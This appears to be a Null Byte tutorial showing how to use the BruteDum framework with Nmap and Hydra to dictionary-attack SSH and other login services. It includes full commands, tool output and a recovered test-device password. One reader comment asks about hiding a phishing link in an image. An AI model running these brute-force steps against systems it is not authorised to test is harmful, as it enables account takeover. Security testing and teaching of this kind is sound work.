How To: Brute-Force SSH, FTP, VNC & More with BruteDum

Brute-Force SSH, FTP, VNC & More with BruteDum

Brute-forcing is an easy way of discovering weak login credentials and is often one of the first steps when a hacker finds network services running on a network they gain access to. For beginners and experienced hackers alike, it's useful to have access to the right tools to discover, classify, and then launch customized brute-force attacks against a target. BruteDum does it all from a single framework.

Weak Passwords Are Easy Prey

When a hacker gains access to a system with services running on it, one of the first things they'll typically do is see if they can log in to any of those services using default or common credentials. Internet of Things (IoT) hardware and devices like routers are often left with default passwords enabled, making them easy to attack.

To test the services they discover for weak passwords, the hacker needs to select the right tool for the job, and it can be confusing to know which tool is the best to use against a particular service.

BruteDum is a Python tool that allows a hacker to acquire a target first and run a scan inside the framework to determine the best tool based on what is discovered. It's easy to run a brute-force or dictionary attack against nearly any standard protocol that's vulnerable to it.

The advantage of running BruteDum over specific tools is the ability to run a scan from within to identify what other processes may be running on the same device, as well as organizing powerful tools for breaking into user accounts on services like SSH.

Online or Connected Attacks

Unlike attacks launched against WPA networks where we can grab a hash and attempt cracking later, we need to be connected to our target directly over the network to try a brute-forcing or dictionary attack. While there are ways of hiding our identity with a VPN or Tor, brute-force and dictionary attacks can be limited in effectiveness through a variety of different means.

One way of limiting brute-force and dictionary attacks is through rate-limiting, in which a lockout is triggered after a set amount of incorrect login attempts. That, combined with flagging suspicious login attempts, can make brute-force and dictionary assaults more likely to alert a target that they are under attack.

To execute an online dictionary attack, we'll be using THC Hydra, Medusa, or Ncrack against the services we discover, using BruteDum to scan and organize our attacks between these tools. We'll also need a password list, which will be critical to the success or failure of our dictionary attack. If the password list is too large, it will take too long to attack the network, and if it isn't reasonably long enough to contain the password, we run the risk of it not being in the list, causing the attack to fail.

What You'll Need

To follow this guide, you'll need Python3 installed on your system. Also, I recommend using Kali Linux, as it should have most of the required programs installed by default. If you're doing this on another system, you'll need to make sure that you have all the prerequisite programs installed.

If you're not using Kali Linux, you can use Ubuntu or Debian, but you'll need to make sure you have Hydra, Medusa, and Ncrack installed. You'll also need Nmap for scanning.

We'll also need a password list to test, and in this case, we'll be downloading it to a folder we create later. If you have a favorite password list, you'll need to copy it to the folder we'll be making.

Step 1: Download & Set Up BruteDum

To get started, we'll need to download the repository from GitHub. In a new terminal window, you can type in the following command to clone the repo.

~$ git clone https://github.com/GitHackTools/BruteDum

Cloning into 'BruteDum'...
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (15/15), done.

And this one to navigate into the directory:

~$ cd BruteDum

From inside this folder, you'll be able to run BruteDum. Before we do, we should take care of one small quirk. I found that BruteDum couldn't find password lists saved outside the BruteDum folder, so the solution seems to be adding our password list directly there. To do this, I'll simply take one off GitHub, and I'll download it to the folder I'm in using the wget command.

~/BruteDum$ wget https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt

--2020-01-10 17:19:59--  https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1620 (1.6K) [text/plain]
Saving to: ‘Top207-probable-v2.txt’

Top207-probable-v2. 100%[===================>]   1.58K  --.-KB/s    in 0s

2020-01-10 17:19:59 (53.3 MB/s) - ‘Top207-probable-v2.txt’ saved [1620/1620]

Once it's done, we can run BruteDum by typing the following command.

~/BruteDum$ python3 brutedum.py

888888                           888888                BRUTE
8    8   eeeee  e   e eeeee eeee 8    8 e   e eeeeeee  FORCE
8eeee8ee 8   8  8   8   8   8    8e   8 8   8 8  8  8  JUST
88     8 8eee8e 8e  8   8e  8eee 88   8 8e  8 8e 8  8  FOR
88     8 88   8 88  8   88  88   88   8 88  8 88 8  8  THE
88eeeee8 88   8 88ee8   88  88ee 88eee8 88ee8 88 8  8  DUMMIES

[i] BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack
    Author: https://GitHackTools.blogspot.com

[?] Enter the victim address:

Step 2: Enter the Target Address

After the loading screen finishes, we'll need to enter the IP address of the victim. Once you've done so, press Enter, and you'll be presented with the option to run an Nmap scan. It's a handy feature that can help you discover other services open on the same device. Type Y and hit Enter to run the Nmap scan.

[?] Enter the victim address: 192.168.43.1

[?] Do you want to scan victim's ports with Nmap? [Y/n]: Y

When the results return, you should be able to identify any ports that come back as "open." Next, you'll need to select a service to crack. The menu for doing so is quite easy to understand, and you can choose one that matches the service that our Nmap scan discovered.

[+] Scanning ports with Nmap...

Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-10 02:57 PDT
Nmap scan report for 192.168.43.1
Host is up (0.0087s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: ███.███.███.███.███.███

Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds

[1] FTP                       [2] Telnet
        (Default port is 21)          (Default port is 23)
    [3] PostgreSQL                [4] SSH
        (Default port is 5432)        (Default port is 22)
    [5] RDP                       [6] VNC
        (Default port is 3389)        (Default port is 5900)

[?] Which protocol do you want to crack? [1-6]: 4

In our example, we'll select option 4 and hit Enter to indicate we want to do SSH cracking.

Step 3: Select the Tool

Now, we'll need to determine the tool we'll be using to try cracking the password. Depending on what service we selected, BruteDum will recommend one to use.

888888                           888888                BRUTE
8    8   eeeee  e   e eeeee eeee 8    8 e   e eeeeeee  FORCE
8eeee8ee 8   8  8   8   8   8    8e   8 8   8 8  8  8  JUST
88     8 8eee8e 8e  8   8e  8eee 88   8 8e  8 8e 8  8  FOR
88     8 88   8 88  8   88  88   88   8 88  8 88 8  8  THE
88eeeee8 88   8 88ee8   88  88ee 88eee8 88ee8 88 8  8  DUMMIES

[i] BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack
    Author: https://GitHackTools.blogspot.com

[i] Target: 192.168.43.1
    Protocol: ssh

    [1] Ncrack
    [2] Hydra (Recommended)
    [3] Medusa

[?] Which tool do you want to use? [1-3]: 2

We'll select Hydra, as it's the one recommended for cracking SSH. Type 2 to indicate Hydra (or the number of the tool you wish to use) and press Enter to begin configuring it.

Step 4: Set Username & Password Lists

To launch our attack, we'll need to make a time versus probability tradeoff. Our first option will be to select a username list. That means we'll be trying every password in our password list with every username in our username list. It can become a lot of attempts very quickly.

In our example, we can select N to decline using a username list. Instead, we'll use a common username, or one we might know exists by default on the type of device.

[i] Target: 192.168.43.1
    Protocol: ssh
[?] Do you want to use username list? [Y/n]: N

Because we declined to supply a username list, we'll have to enter one manually instead. Here, I'll enter toor, as I know that's the username for our test device.

[?] Enter the username: toor

Next, we'll need to set the password list. It won't work if we select a password list outside of the directory we're in, so we can now add the password list we downloaded earlier. If you followed along before, we should be able to just paste in the Top207-probable-v2.txt wordlist here.

[?] Enter the path of wordlist: Top207-probable-v2.txt

Step 5: Launch the Attack

Finally, we can decide if we want to use the default port or not. Some devices may host services on a port other than the standard one, but this isn't very common. For SSH, the default port is 22, so we'll just enter Y and hit Enter.

[?] Do you want to use default port? [Y/n]: Y

If you're attacking a service on a non-standard port, you can specify it here and press Enter. Do not accidentally type in the number of the port you want to attack here, as the script will crash.

As soon as you supply the port, BruteDum will launch the tool you specified.

[i] Target: 192.168.43.1
    Protocol: ssh
[+] Hydra is cracking...

Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-10 09:23:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 208 login tries (l:1/p:208), ~13 tries per task
[DATA] attacking ssh://192.168.43.1:22/

After some time to attack the network and try all of the passwords, you'll get a result, either revealing the password or reporting that a valid password was not found.

[22][ssh] host: 192.168.43.1   login: toor   password: root
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-10 10:51:18

[?] Do you want to conitnue? [Y/n]: N

Brute-Force Attacks Find Weak Passwords

A key thing to remember about brute-force and dictionary attacks is that they are powerful in the right place, but not a silver bullet for breaking into accounts. Weak passwords are especially easy to find with BruteDum, but more complicated passwords require longer password lists. That issue necessitates prolonged contact with the victim to burn through those longer lists, making the attack less practical and more evident to anyone watching for this kind of attack.

An ideal target for these attacks is primarily IoT devices, which generally have poor security and a plethora of services running with default credentials.

I hope you enjoyed this guide to brute-forcing weak login credentials with BruteDum! If you have any questions about this tutorial on brute-forcing frameworks or you have a comment, there's the comments section below, and feel free to reach me on Twitter @KodyKinzie.

Want to start making money as a white hat hacker? Jump start your White-Hat Hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from Ethical Hacking Professionals.

Buy Now (96% off) >

Cover image by Kody/Null Byte

Our Best Hacking & Security Guides

New Null Byte posts — delivered straight to your inbox.

5 Comments

It is like Sparta in Kali Linux?

thanks sir
how can i install this full video please!

Thanks for the tutorial!! But what do you do if you need to use the username list ?? I hope you get back to me!

how to insert a phishing link into the image??

Share Your Thoughts

  • Hot
  • Latest